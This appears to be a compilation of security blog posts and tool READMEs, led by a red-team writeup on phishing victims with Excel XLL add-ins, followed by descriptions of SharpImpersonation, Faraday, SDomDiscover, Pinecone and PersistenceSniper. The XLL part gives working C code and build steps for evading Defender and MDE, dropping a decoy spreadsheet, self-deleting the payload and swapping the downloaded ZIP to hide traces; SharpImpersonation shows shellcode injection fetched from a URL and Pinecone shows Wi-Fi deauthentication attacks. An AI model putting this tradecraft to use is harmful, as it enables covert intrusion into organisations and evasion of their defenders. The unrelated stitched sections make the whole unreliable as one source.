We really seem to be backed into a corner here. Running the XLL itself is fine, however the XLL cannot be delivered by itself to the victim either via email attachment or web download due to organization policy. The XLL needs to be packaged inside a container, however due to DLP, formats like ISO, IMG, and VHD are not viable. The victim needs to be able to open the container natively without any third-party software, which really leaves ZIP as the option; however, as discussed, running the XLL from a zipped folder results in it being copied and run from appdata\local\temp, which flags AV.

I spent many hours brainstorming and testing things, going down the VSTO rabbit hole, and exploring all conceivable options until I finally decided to try something so dumb it just might work.

This time I created a folder, placed the XLL inside it, and then zipped the folder:


Clicking into the folder reveals the XLL file:


Double clicking the XLL shows the Add-In prompt from Excel. Note that the XLL is still copied to appdata\local\temp, however there is an additional layer due to the extra folder that we created:


Clicking enable executes our code without flagging Defender:


Nice! Code execution. Now what?

Tradecraft

The pretexting involved in getting a victim to download and execute the XLL will vary wildly based on the organization and delivery method; themes might include employee salary data, calculators for compensation based on skillset, information on a project, an attendee roster for an event, etc. Whatever the lure, our attack will be a lot more effective if we actually provide the victim with what they have been promised. Without follow through, victims may become suspicious and report the document to their security teams which can quickly give the attacker away and curtail access to the target system.

The XLL by itself will just leave a blank Excel window after our code is done executing; it would be much better for us to provide the Excel Spreadsheet that the victim is looking for.

We can embed our XLSX as a byte array inside the XLL; when the XLL executes, it will drop the XLSX to disk beside the XLL after which it will be opened. We will name the XLSX the same as the XLL, the only difference being the extension.
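As a rough sketch of that drop-and-open step (names are illustrative and the byte array is truncated, so this is not the exact code from my runner), the idea looks something like this:

#include <windows.h>
#include <shellapi.h>
#include <stdio.h>

// Hypothetical array holding the embedded spreadsheet; in practice it is
// filled with the hex produced by the ingest tool described later on.
static const unsigned char xlsx_bytes[] = { 0x50, 0x4b /* ...rest of the XLSX... */ };

// Write the embedded XLSX to disk and hand it to the registered handler
// (Excel), so the victim sees the spreadsheet they were promised.
static void drop_and_open_xlsx(const char *xlsx_path)
{
    FILE *f = fopen(xlsx_path, "wb");
    if (!f) return;
    fwrite(xlsx_bytes, 1, sizeof(xlsx_bytes), f);
    fclose(f);

    ShellExecuteA(NULL, "open", xlsx_path, NULL, NULL, SW_SHOWNORMAL);
}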

Given that our XLL is written in C, we can bring in some of the capabilities from a previous writeup I did on Payload Capabilities in C, namely Self-Deletion. Combining these two techniques results in the XLL being deleted from disk and the XLSX of the same name being dropped in its place. To the undiscerning eye, it will appear that the XLSX was there the entire time.
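One commonly published way to implement the self-deletion piece on Windows is to rename the file's primary data stream to an alternate stream and then set the delete disposition on the handle; the sketch below follows that approach and is illustrative rather than the exact code from the earlier writeup.

#include <windows.h>
#include <stdlib.h>
#include <string.h>

// Hedged sketch of stream-rename self-deletion: rename :$DATA to an
// arbitrary alternate stream, then mark the file for deletion so it is
// removed once the last handle closes.
static BOOL self_delete(const wchar_t *path)
{
    wchar_t stream[] = L":xll";
    DWORD len = (DWORD)(sizeof(FILE_RENAME_INFO) + sizeof(stream));
    FILE_RENAME_INFO *rename = (FILE_RENAME_INFO *)calloc(1, len);
    if (!rename) return FALSE;
    rename->FileNameLength = sizeof(stream) - sizeof(wchar_t);
    memcpy(rename->FileName, stream, sizeof(stream));

    HANDLE h = CreateFileW(path, DELETE | SYNCHRONIZE, FILE_SHARE_READ,
                           NULL, OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE) { free(rename); return FALSE; }
    BOOL ok = SetFileInformationByHandle(h, FileRenameInfo, rename, len);
    CloseHandle(h);
    free(rename);
    if (!ok) return FALSE;

    // Reopen the renamed file and flag it for deletion.
    h = CreateFileW(path, DELETE | SYNCHRONIZE, FILE_SHARE_READ,
                    NULL, OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE) return FALSE;
    FILE_DISPOSITION_INFO dispose = { TRUE };
    ok = SetFileInformationByHandle(h, FileDispositionInfo, &dispose, sizeof(dispose));
    CloseHandle(h);
    return ok;
}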

Unfortunately, the location where the XLL is deleted and the XLSX dropped is the appdata\local\temp folder, not the original ZIP; to address this we can create a second ZIP containing the XLSX alone and also read it into a byte array within the XLL. On execution, in addition to the aforementioned actions, the XLL can try to locate the original ZIP file in c:\users\victim\Downloads\ and delete it before dropping the second ZIP, containing just the XLSX, in its place. This could of course fail if the user saved the original ZIP in a different location or under a different name; however, in most cases it will have landed in the user's Downloads folder automatically.
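A sketch of that ZIP-swap step is below. The Downloads path and the file name spreadsheet.zip are assumptions for illustration; if the ZIP is not where we expect it, the routine simply does nothing.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Hypothetical array holding the benign replacement ZIP (folder + XLSX only).
static const unsigned char clean_zip_bytes[] = { 0x50, 0x4b /* ...benign ZIP... */ };

// Replace the originally downloaded ZIP (which contained the XLL) with the
// benign ZIP, assuming it still sits in the user's Downloads folder.
static void swap_downloaded_zip(void)
{
    const char *profile = getenv("USERPROFILE");
    if (!profile) return;

    char path[MAX_PATH];
    snprintf(path, sizeof(path), "%s\\Downloads\\spreadsheet.zip", profile);

    if (!DeleteFileA(path)) return;   // not there, or not removable: bail out

    FILE *f = fopen(path, "wb");
    if (!f) return;
    fwrite(clean_zip_bytes, 1, sizeof(clean_zip_bytes), f);
    fclose(f);
}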


This screenshot shows, in the lower pane, the temp folder created in appdata\local\temp containing the XLL and the dropped XLSX, while the top pane shows the original File Explorer window from which the XLL was opened. Notice in the lower pane that the XLL has a size of 0. This is because it deleted itself during execution; however, until the top pane is closed the XLL file will not completely disappear from the appdata\local\temp location. Even if the victim were to click the XLL again, it is now inert and effectively no longer exists.

Similarly, as soon as the victim backs out of the opened ZIP in File Explorer (either by closing it or navigating to a different folder), should they click spreadsheet.zip again they will find that the test folder now contains importantdoc.xlsx; the XLL has been removed and replaced by the harmless XLSX in both locations where it existed on disk.

This GIF demonstrates the download and execution of the XLL on an MDE trial VM. Note that for some reason Excel opens two instances here; on my home computer it only opened one, so I'm not quite sure why that differs.


Detection

As always, we will ask "What does MDE see?"

A quick screenshot dump to prove that I did execute this on target and catch a beacon back on TestMachine11:




First off, zero alerts:


What does the timeline/event log capture?


Yikes. Truth be told, I have no idea where the keylogging, encrypting, and decrypting credentials alerts are coming from, as my code doesn't do any of that. Our actions sure look suspicious when laid out like this, but I will again comment on just how much data MDE collects on a single endpoint, let alone the hundreds, thousands, or hundreds of thousands of endpoints that an organization may have hooked into the EDR. So long as we aren't throwing any actual alerts, we are probably ok.

Code Sample

The moment most have probably been waiting for: I am providing a code sample of my XLL runner, limited to just those parts discussed here in the Tradecraft section. It will be on the reader to actually get the code into an XLL and implement it in conjunction with the rest of their runner. As always, do no harm, have permission to phish an organization, etc.

Compiling and setup

I have included the source code for a program that will ingest a file and produce hex which can be copied into the byte arrays defined in the snippet. Use this on the XLSX you wish to present to the user, as well as on the ZIP file containing the folder which contains that same XLSX, and store them in their respective byte arrays. Compile this code using:

gcc -o ingestfile ingestfile.c
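If you do not have the original ingestfile.c handy, any equivalent file-to-hex helper will do; the stand-in below is illustrative and not necessarily identical to the program referenced above.

/* Illustrative stand-in for ingestfile.c: read a file and print its bytes
 * as a C array initializer that can be pasted into the XLL's byte arrays. */
#include <stdio.h>

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 1;
    }
    FILE *f = fopen(argv[1], "rb");
    if (!f) {
        perror("fopen");
        return 1;
    }

    int c;
    unsigned long count = 0;
    while ((c = fgetc(f)) != EOF)
        printf("0x%02x,%s", c, (++count % 12 == 0) ? "\n" : " ");
    printf("\n");
    fclose(f);
    return 0;
}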

I had some issues getting my XLLs to compile using MinGW on a Kali machine, so I thought I would post the commands here:

x64

x86_64-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB -o importantdoc.xll -s -Os -DUNICODE -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/

x86

i686-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/XLCALL32.LIB -o HelloWorldXll.xll -s -DUNICODE -Os -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/ 

After you compile you will want to make a new folder and copy the XLL into that folder. Then zip it using:

zip -r <myzipname>.zip <foldername>/

Note that in order for the tradecraft outlined in this post to work, you are going to need to match some variables in the code snippet to what you name the XLL and the zip file.

Conclusion

With the dominance of Office macros coming to a close, XLLs present an attractive option for phishing campaigns. With some creativity they can be used in conjunction with other techniques to bypass many layers of defenses implemented by organizations and security teams. Thank you for reading and I hope you learned something useful!



SharpImpersonation - A User Impersonation Tool - Via Token Or Shellcode Injection


This was a learning-by-doing project on my side. Well-known techniques are used to build just another impersonation tool, with some improvements in comparison to other public tools. The code base was taken from:

A blog post for the introduction can be found here:


List user processes

PS C:\temp> SharpImpersonation.exe list


List only elevated processes

PS C:\temp> SharpImpersonation.exe list elevated

Impersonate the first process of the target user to start a new binary

PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>


Inject base64 encoded shellcode into the first process of the target user

PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>


Inject shellcode loaded from a webserver into the first process of the target user

PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>


Impersonate the target user via ImpersonateLoggedOnuser for the current session

PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser


Faraday 4.1.0

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for the distribution, indexing, and analysis of the data generated during a security audit. The main purpose of Faraday is to re-use the tools available in the community and take advantage of them in a multiuser way.

SDomDiscover - An Easy-To-Use Python Tool To Perform DNS Recon



   _____ ____                  ____  _                               
/ ___// __ \____ ____ ___ / __ \(_)_____________ _ _____ _____
\__ \/ / / / __ \/ __ `__ \/ / / / / ___/ ___/ __ \ | / / _ \/ ___/
___/ / /_/ / /_/ / / / / / / /_/ / (__ ) /__/ /_/ / |/ / __/ /
/____/_____/\____/_/ /_/ /_/_____/_/____/\___/\____/|___/\___/_/

An easy-to-use Python tool to perform DNS recon with multiple options

Installation:

It can be installed on any OS with Python 3

Manual installation

git clone https://github.com/D3Ext/SDomDiscover
cd SDomDiscover
pip3 install -r requirements.txt

One-liner

git clone https://github.com/D3Ext/SDomDiscover && cd SDomDiscover && pip3 install -r requirements.txt && python3 SDomDiscover.py

Usage:

Common usages

To see the help panel and other parameters

python3 SDomDiscover.py -h

Main usage of the tool to dump the valid domains in the SSL certificate

python3 SDomDiscover.py -d example.com

Used to perform all the queries and reconnaissance

python3 SDomDiscover.py -d domain.com --all


Pinecone - A WLAN Red Team Framework


Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.

This tool is designed for educational and research purposes only. Only use it with explicit permission.


Installation

For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:

  • Python 3.5+. Your distribution probably comes with Python3 already installed, if not it can be installed using apt-get install python3.
  • dnsmasq (tested with version 2.76). Can be installed using apt-get install dnsmasq.
  • hostapd-wpe (tested with version 2.6). Can be installed using apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.

After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.

Usage

To start Pinecone, execute python3 pinecone.py from within the project root folder:

root@kali:~/pinecone# python pinecone.py 
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >

Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:

pinecone > help

Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias

Undocumented commands:
======================
back run stop

pinecone > help use
Usage: use module [-h]

Interact with the specified module.

positional arguments:
module module ID

optional arguments:
-h, --help show this help message and exit

Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of currently loaded modules:

pinecone > use 
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >

Every module has options that can be seen by typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):

pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)

When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:

pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...

If the module runs in the background (for example, scripts/infrastructure/ap), you can stop it using the stop command while the module is running:

When you are done using a module, you can deactivate it by using the back command. You can also activate another module issuing the use command again.

Shell commands may be executed with the command shell or the ! shortcut:

pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md

Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.



PersistenceSniper - Powershell Script That Can Be Used By Blue Teams, Incident Responders And System Administrators To Hunt Persistences Implanted In Windows Machines


PersistenceSniper is a Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. The script is also available on Powershell Gallery.


The Why

Why write such a tool, you might ask. Well, for starters, I tried looking around and did not find a tool which suited my particular use case: looking for known persistence techniques, automatically, across multiple machines, while also being able to quickly and easily parse and compare results. Sure, Sysinternals' Autoruns is an amazing tool and it's definitely worth using, but, given that it outputs results in non-standard formats and can't be run remotely unless you do some shenanigans with its command-line equivalent, I did not find it a good fit for me. Plus, some of the techniques I have implemented so far in PersistenceSniper have not been implemented in Autoruns yet, as far as I know. Anyway, if what you need is an easy-to-use, GUI-based tool with lots of already implemented features, Autoruns is the way to go; otherwise let PersistenceSniper have a shot, it won't miss it :)

Usage

Using PersistenceSniper is as simple as:

PS C:\> git clone https://github.com/last-byte/PersistenceSniper
PS C:\> Import-Module .\PersistenceSniper\PersistenceSniper\PersistenceSniper.psd1
PS C:\> Find-AllPersistence

If you need a detailed explanation of how to use the tool or which parameters are available and how they work, PersistenceSniper's Find-AllPersistence supports Powershell's help features, so you can get detailed, updated help by using the following command after importing the module:

Get-Help -Name Find-AllPersistence -Full

PersistenceSniper's Find-AllPersistence returns an array of objects of type PSCustomObject with the following properties:

This allows for easy output formatting and filtering. Let's say you only want to see the persistences that will allow the attacker to regain access as NT AUTHORITY\SYSTEM (aka System):
PS C:\> Find-AllPersistence | Where-Object "Access Gained" -EQ "System"


Of course, PersistenceSniper being a Powershell-based tool, some cool tricks can be performed, like passing its output to Out-GridView in order to have a GUI-based table to interact with.


Interpreting results

As already introduced, Find-AllPersistence outputs an array of Powershell Custom Objects. Each object has the following properties, which can be used to filter, sort and better understand the different techniques the function looks for:

  • ComputerName: this is fairly straightforward. If you run Find-AllPersistence without a -ComputerName parameter, PersistenceSniper will run only on the local machine. Otherwise it will run on the remote computer(s) you specify;
  • Technique: this is the name of the technique itself, as it's commonly known in the community;
  • Classification: this property can be used to quickly identify techniques based on their MITRE ATT&CK technique and subtechnique number. For those techniques which don't have a MITRE ATT&CK classification, other classifications are used, the most common being Hexacorn's one since a lot of techniques were discovered by him. When a technique's source cannot be reliably identified, the "Uncatalogued Technique N.#" classification is used;
  • Path: this is the path, on the filesystem or in the registry, at which the technique has been implanted;
  • Value: this is the value of the registry property the techniques uses, or the name of the executable/library used, in case it's a technique which relies on planting something on the filesystem;
  • Access Gained: this is the kind of access the technique grants the attacker. If it's a Run key under HKCU for example, the access gained will be at a user level, while if it's under HKLM it will be at system level;
  • Note: this is a quick explanation of the technique, so that its workings can be easily grasped;
  • Reference: this is a link to a more in-depth explanation of the technique, should the analyst need to study it more.

Dealing with false positives

Let's face it, hunting for persistence techniques also comes with having to deal with a lot of false positives. This happens because, while some techniques are almost never legitimately used, many indeed are used by legit software which needs to autorun on system boot or user login.

This poses a challenge, which in many environments can be tackled by creating a CSV file containing known false positives. If your organization deploys systems using something like a golden image, you can run PersistenceSniper on a system you just created, get a CSV of the results and use it to filter out results on other machines. This approach comes with the following benefits:

  • Not having to manage a whitelist of persistences which can be tedious and error-prone;
  • Tailoring the false positives to the organizations, and their organizational units, which use the tool;
  • Making it harder for attackers who want to blend in false positives by not publicly disclosing them in the tool's code.

Find-AllPersistence comes with parameters allowing direct output of the findings to a CSV file, while also being able to take a CSV file as input and diffing the results.

PS C:\> Find-AllPersistence -DiffCSV false_positives.csv


Looking for persistences by taking incremental snapshots

One cool way to use PersistenceSniper, suggested by my mate Riccardo, is to use it incrementally: you could set up a Scheduled Task which runs every X hours, takes in the output of the previous iteration through the -DiffCSV parameter, and outputs the results to a new CSV. By keeping track of the incremental changes, you should be able to spot, within a reasonably small time frame, new persistences implanted on the machine you are monitoring.

Persistence techniques implemented so far

The topic of persistence, especially on Windows machines, is one of those which see new discoveries basically every other week. Given the sheer amount of persistence techniques found so far by researchers, I am still in the process of implementing them. So far the following 31 techniques have been implemented successfully:

Credits

The techniques implemented in this script have already been published by skilled researchers around the globe, so it's right to give credit where credit's due. This project wouldn't be around if it weren't for:

I'd also like to give credits to my fellow mates at @APTortellini, in particular Riccardo Ancarani, for the flood of ideas that helped it grow from a puny text-oriented script to a full-fledged Powershell tool.

License

This project is under the CC0 1.0 Universal license. TL;DR: you can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission.



โŒ